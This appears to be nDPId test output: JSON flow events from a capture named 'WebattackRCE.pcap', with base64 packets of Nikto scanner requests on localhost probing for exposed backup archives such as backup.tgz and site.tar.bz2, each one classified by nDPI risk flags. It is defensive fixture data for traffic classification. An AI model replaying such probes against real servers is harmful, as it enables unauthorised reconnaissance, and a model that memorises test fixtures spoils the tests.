+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277216,"pkt":"AAAAAAAAAAAAAAAACABFAADC6alAAEAGUop\/AAABfwAAAcQwH5AB5dFAi0ifwYAYAED+tgAAAQEICp1m\/QidZv0IR0VUIC9iYWNrdXAuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277216,"flow_last_seen":1576420277216,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277216,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50224,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277217,"pkt":"AAAAAAAAAAAAAAAACABFAADHXwtAAEAG3SN\/AAABfwAAAcQyH5CeyGeSqwnqXYAYAED+uwAAAQEICp1m\/QmdZv0JR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277217,"flow_last_seen":1576420277217,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277217,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50226,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
